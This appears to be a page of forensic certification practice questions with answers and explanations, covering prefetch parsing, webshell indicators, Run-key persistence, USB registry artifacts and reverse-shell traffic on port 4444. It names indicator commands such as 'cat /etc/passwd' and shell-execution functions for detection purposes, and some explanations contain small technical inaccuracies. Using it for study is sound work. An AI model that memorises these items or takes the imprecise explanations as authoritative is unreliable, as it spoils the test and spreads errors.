A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

A.prefetch.exe (built‑in Windows tool)
B.ShellBags Explorer
C.PECmd
D.JumpLister
AnswerC

PECmd (Prefetch Explorer Command-Line) is a free and widely accepted tool by Eric Zimmerman that parses Windows Prefetch (.pf) files. It extracts the executable's last run time, run count, and the list of referenced files and DLLs, exporting the results to CSV, HTML, or JSON for further triage. Because it stabilizes and standardizes prefetch decoding, it is the recommended option when an examiner needs to prove which binaries executed on a system.

Why this answer

PECmd (Prefetch Explorer Command-line) is a dedicated forensic tool from Eric Zimmerman's suite designed specifically to parse Windows prefetch files (.pf). It extracts detailed metadata including the last execution time, run count, and referenced files, making it the best choice for this task. Built-in Windows tools do not provide a 'prefetch.exe' utility, and other options like ShellBags Explorer or JumpLister target different artifacts (registry shell bags and jump lists, respectively).

Exam trap

The trap here is that candidates may assume a built-in Windows tool named 'prefetch.exe' exists or confuse prefetch analysis with other Windows forensic artifacts like shell bags or jump lists, leading them to pick a plausible-sounding but incorrect option.

How to eliminate wrong answers

Option A is wrong because there is no built-in Windows tool named 'prefetch.exe'; Windows does not ship a command-line utility for parsing prefetch files, and the system's own prefetching mechanism is managed by the operating system without a user-facing executable for forensic analysis. Option B is wrong because ShellBags Explorer is designed to parse registry shell bag data (MRU lists for folder views), not prefetch files; it cannot extract execution timestamps from .pf files. Option D is wrong because JumpLister is used to parse Windows jump lists (stored in %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations), which track recently opened files via the taskbar, not application execution times stored in prefetch files.

68
Multi-Selecthard

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Select 3 answers
A.Multiple failed login attempts in auth.log
B.Presence of system commands in web server error logs
C.Unusual files with .asp, .php, or .jsp extensions in web directories
D.Outbound connections from the web server to suspicious IP addresses
E.High CPU usage from the web server process
AnswersB, C, D

Webshells often invoke server-side commands through PHP functions like system(), exec(), or shell_exec() with attacker-supplied input. When these commands produce errors or partial output that is not sanitized, the web server's error log may capture snippets of OS commands such as id, whoami, ls -la, or cat /etc/passwd. A properly functioning application should never intentionally write raw system command output to error logs, so their presence is a strong sign of webshell activity.

Why this answer

Option B is correct because webshells typically execute operating-system commands (e.g., cmd.exe, /bin/sh, whoami, net user) that get recorded in web server error logs when the shell's input or output triggers errors, making such command strings a strong indicator of compromise. Option C is correct because attackers drop webshell files with executable web extensions such as .asp, .php, or .jsp into web-accessible directories (often with obfuscated or unusual names) so they can be invoked remotely over HTTP. Option D is correct because a webshell commonly initiates outbound connections from the web server to attacker-controlled command-and-control or exfiltration IP addresses, which is anomalous for a server that should mainly receive inbound HTTP requests.

Option A is not specific to webshells, since multiple failed logins in auth.log indicate brute-force or credential attacks against SSH or other services rather than a web-based backdoor. Option E is also not specific, because high CPU usage from the web server process can result from legitimate traffic spikes, misconfiguration, or other malware, and is not a distinctive webshell indicator.

Exam trap

EC-Council often tests the distinction between generic performance anomalies (like high CPU) and specific forensic artifacts (like command strings in logs), leading candidates to over-select Option E as a webshell indicator when it is actually a non-specific symptom.

69
MCQmedium

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

A.HKLM\SAM\SAM
B.HKLM\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D.HKLM\SYSTEM\CurrentControlSet\Services
AnswerB

This key is the per-machine Run key and is one of the classic autostart locations processed when a user logs on. Each value under it is a command-line string whose data is the full path or command used to start a program, and the system executes all such entries automatically at logon. Because entries here apply to every interactive user and require no special privileges to write in some use cases, this is a common persistence mechanism and the correct registry location to inspect for automatic startup programs.

Why this answer

The 'Run' key at HKLM\Software\Microsoft\Windows\CurrentVersion\Run is the standard registry location used by legitimate software and malware alike to execute a program automatically at every system startup. This key stores values that point to executable paths, and Windows’ Winlogon process reads these values during boot to launch the specified programs. It is a primary persistence mechanism in Windows forensics.

Exam trap

CHFI often tests the distinction between the 'Run' key and the 'Services' key (option D), as candidates may confuse auto-start services with the simpler 'Run' registry persistence mechanism.

How to eliminate wrong answers

Option A is wrong because HKLM\SAM\SAM contains the Security Account Manager (SAM) database with hashed user passwords, not startup program configurations. Option C is wrong because HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon stores settings for the Winlogon process (e.g., Userinit, Shell) and is not the standard 'Run' key for user-level or machine-level auto-start programs. Option D is wrong because HKLM\SYSTEM\CurrentControlSet\Services holds service definitions and their start types (e.g., auto-start services), but it is not the 'Run' key; services are a separate persistence mechanism managed by the Service Control Manager (SCM).

70
MCQmedium

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Enum\USB
AnswerA

This is the authoritative artifact for USB mass storage device forensics. Each time a USB drive or external storage device is attached, Windows enumerates it under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR, creating a subkey whose name contains the device instance ID, vendor, product, revision, and often the unique serial number. The LastWrite time of these subkeys reflects when the device was installed/configured, enabling an examiner to reconstruct a timeline of device connections and identify the specific physical drive by its serial number.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum stores a subkey for each USB mass storage device that has ever been connected to the system. Each subkey is named with the device's serial number, and its creation timestamp reflects the first time the device was enumerated (i.e., first connected). This makes it the definitive source for both the serial number and the initial connection time of a USB device.

Exam trap

EC-Council often tests whether candidates confuse the generic USB hub enumeration key (USB) with the mass storage device-specific key (USBSTOR), leading them to pick Option D instead of A.

How to eliminate wrong answers

Option B is wrong because MountPoints2 stores user-specific drive letter mappings and volume GUIDs, not serial numbers or first-connection timestamps for USB devices. Option C is wrong because ShellBags tracks folder view settings and window positions for Explorer, not USB device enumeration or serial numbers. Option D is wrong because the USB key under Enum contains generic USB hub and controller descriptors, not the USB mass storage device instances with serial numbers that USBSTOR provides.

71
Multi-Selectmedium

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Select 2 answers
A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\Software\Microsoft\Windows NT\CurrentVersion\Prefetch
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\SAM\SAM\Domains\Account\Users
AnswersA, B

HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR is the Windows Plug and Play device enumeration tree for USB mass storage devices, recording every device instance that has ever been connected to the system. Each subkey is named with the device's vendor, product, and unique serial number, and it persists even after the device is unplugged, making it a critical artifact for proving a specific USB drive was attached. Forensic examiners use this key to identify not only the make/model but also the serial number and, when correlated with SetupAPI logs, the first/last connection times.

Why this answer

Option A is correct because HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR is the primary registry key where Windows records USB mass storage devices that have been connected, storing device instance IDs, serial numbers, and vendor/product information used to prove USB storage usage. Option B is correct because HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 tracks per-user mounted volumes, including USB drives, by recording volume GUIDs and drive-letter mappings that correlate a device to a specific user account. Option C is incorrect because the Prefetch registry path does not exist as a USB history store; prefetch execution evidence resides in C:\Windows\Prefetch as .pf files, not in that registry location.

Option D is incorrect because HKCU\...\Run is an autostart persistence key for programs launched at logon, not a record of USB device connections. Option E is incorrect because HKLM\SAM\...\Users stores local account and credential-related data (such as RID-based user records and password hashes), not USB device history.

Exam trap

EC-Council often tests the distinction between system-wide (HKLM) and user-specific (HKCU) registry hives, and candidates mistakenly think only one location stores USB history, overlooking that both USBSTOR and MountPoints2 are valid and complementary sources.

72
MCQmedium

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

A.Wireshark
B.Volatility
C.Plaso (log2timeline)
D.FTK Imager
AnswerC

Plaso, also known as log2timeline, is the correct tool because it is purpose-built for constructing super timelines from diverse forensic artifacts, including file system metadata, event logs, and application logs. It ingests disk images or directories, parses time-stamped evidence using modular parsers, and outputs a unified, correlated timeline in SQLite or bodyfile format. Unlike single-purpose tools, Plaso correlates timestamps from multiple sources, enabling robust reconstruction of file system activity such as creation, modification, and access events.

Why this answer

Plaso (log2timeline) is the correct tool because it is specifically designed to create super timelines of file system activity from disk images. It parses a wide range of artifacts including the Windows Registry, Prefetch files, event logs, and other log files, correlating timestamps to reconstruct a chronological sequence of system events.

Exam trap

EC-Council often tests the distinction between acquisition tools (FTK Imager), analysis tools for specific artifacts (Volatility for memory, Wireshark for network), and comprehensive timeline tools (Plaso), so the trap here is assuming a general-purpose tool like FTK Imager can perform artifact parsing and timeline creation when it is only for imaging and preview.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network protocol analyzer that captures and inspects live network traffic (e.g., TCP/IP packets), not a tool for parsing file system artifacts or building timelines from disk images. Option B is wrong because Volatility is a memory forensics framework used to analyze RAM dumps (volatile memory) for processes, network connections, and kernel objects, not for parsing file system artifacts like the registry or prefetch files from a disk image. Option D is wrong because FTK Imager is a disk imaging and preview tool used to acquire and view disk images, but it does not parse artifacts or generate timelines; it is a data acquisition tool, not an analysis tool for timeline creation.

73
MCQeasy

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

A.Wireshark
B.Splunk
C.Nmap
D.SolarWinds NetFlow Traffic Analyzer
AnswerD

SolarWinds NetFlow Traffic Analyzer is a purpose-built network flow collector that receives NetFlow, IPFIX, sFlow, and J-Flow data directly from routers and switches, exporting the records into a SQL database for long-term forensic retention. It computes bandwidth utilization per interface, identifies top talkers and protocols (using Cisco NBAR), and performs baseline anomaly detection to flag suspicious traffic patterns. Because it ingests flow metadata instead of individual packets, it can scale to large enterprise environments and answer forensic questions about which endpoints communicated, for how long, and at what volume — exactly the capability the question requires.

Why this answer

SolarWinds NetFlow Traffic Analyzer (NTA) is specifically designed to collect, analyze, and visualize NetFlow data (and other flow protocols like sFlow, IPFIX, and J-Flow) to identify network traffic patterns, bandwidth usage, and top talkers. Unlike packet-level tools, NTA works on flow records exported by routers and switches, making it ideal for high-level traffic pattern analysis in network forensics.

Exam trap

In network forensics, it is important to distinguish between packet-level analysis (e.g., Wireshark) and flow-level analysis (e.g., NetFlow analyzers). Candidates often mistakenly choose Wireshark because it is a well-known forensic tool, but it cannot natively handle NetFlow data without conversion or plugins.

How to eliminate wrong answers

Option A is wrong because Wireshark is a packet analyzer that captures and inspects individual packets at the frame level, not flow-level data like NetFlow; it cannot natively parse or visualize NetFlow exports without additional plugins or conversion. Option B is wrong because Splunk is a general-purpose log and event management platform that can ingest NetFlow data via add-ons, but it is not a dedicated NetFlow analyzer and requires significant configuration to visualize traffic patterns; the question asks for a tool 'commonly used to analyze and visualize NetFlow data,' and Splunk is not the primary or most direct tool for that purpose. Option C is wrong because Nmap is a network scanning and discovery tool used for port scanning, OS detection, and service enumeration; it does not collect or analyze NetFlow data at all.

74
MCQmedium

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

A.The web server is serving HTTPS traffic on port 4444
B.The web server is performing DNS queries
C.The web server is being scanned for open ports
D.The web server has a reverse shell connection to a command-and-control server
AnswerD

An outbound TCP connection from a compromised web server to a single external IP on a non-standard high port such as 4444 is a classic reverse-shell indicator. Because the server initiates the connection, it can evade typical inbound firewall restrictions, allowing an attacker to receive a shell session through a listener on the command-and-control host. The repeated nature of the connections suggests beaconing for instructions, a hallmark of C2 communication.

Why this answer

Repeated outbound connections from an internal web server to an external server on TCP port 4444 strongly indicate a reverse shell, which is a common technique used by malware to establish command-and-control (C2) communication. Unlike a standard client-server model, the internal host initiates the connection to bypass firewalls that block inbound traffic, and port 4444 is frequently associated with Metasploit's default reverse shell payload (e.g., meterpreter). This behavior is anomalous for a web server, which typically serves HTTP/HTTPS on ports 80/443 and does not initiate persistent outbound connections to arbitrary external IPs on non-standard ports.

Exam trap

The key trap here is that candidates see 'connection attempts' and assume it is an inbound scan (Option C), but the question specifies the internal IP is the source, meaning the web server is initiating the connection, which is the hallmark of a reverse shell or C2 beacon. In CHFI, understanding traffic direction and common C2 port usage is critical.

How to eliminate wrong answers

Option A is wrong because HTTPS traffic is served on TCP port 443 by default, not 4444; while a server could be configured to use a non-standard port, a web server serving HTTPS would not repeatedly initiate outbound connections to an external server—it would listen for inbound connections. Option B is wrong because DNS queries use UDP port 53 (or TCP port 53 for zone transfers), not TCP port 4444, and DNS traffic is typically ephemeral and not characterized by repeated connection attempts to a single external IP. Option C is wrong because a port scan would originate from an external source targeting the internal web server, not from the internal web server to an external server; the log shows outbound connections from the internal host, indicating it is the initiator, not the target of a scan.

75
MCQmedium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

The HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR key is the definitive registry artifact for identifying USB mass storage devices that have been connected to a Windows system. Under this key, the Plug and Play manager creates a subtree in which each vendor/product pair (e.g., Disk&Ven_Kingston&Prod_DataTraveler&Rev_1.00) appears, and beneath that, a unique device instance key named with the device's reported serial number. Forensic examiners can extract the device instance's LastWrite time and the FriendlyName value to confirm both the exact drive and its approximate last connection time. Because the system records this information even after the device is removed, it is the correct key to examine in registry-based USB forensic investigations.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum contains a subkey for each USB mass storage device that has ever been connected to the system, recording the device's serial number, class, and instance ID. This is the primary forensic artifact for identifying USB device connection history because the system enumerates and persists these entries when a USB storage device is first plugged in.

Exam trap

EC-Council often tests the distinction between the hardware enumeration key (USBSTOR) and the user-specific mount point key (MountPoints2), leading candidates to choose the latter because it appears more directly related to 'connected devices' in the registry path.

How to eliminate wrong answers

Option A is wrong because HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run stores startup programs, not USB device connection history. Option B is wrong because NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 stores user-specific mount point mappings and drive letter assignments, but it does not contain the definitive hardware enumeration data for USB devices; it is a secondary artifact that can be deleted or altered by user activity. Option C is wrong because HKLM\SAM\SAM\Domains\Account\Users stores local user account security identifiers (SIDs) and password hashes, not USB device information.

Page 1 of 3 · 167 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Chfi Os Network questions.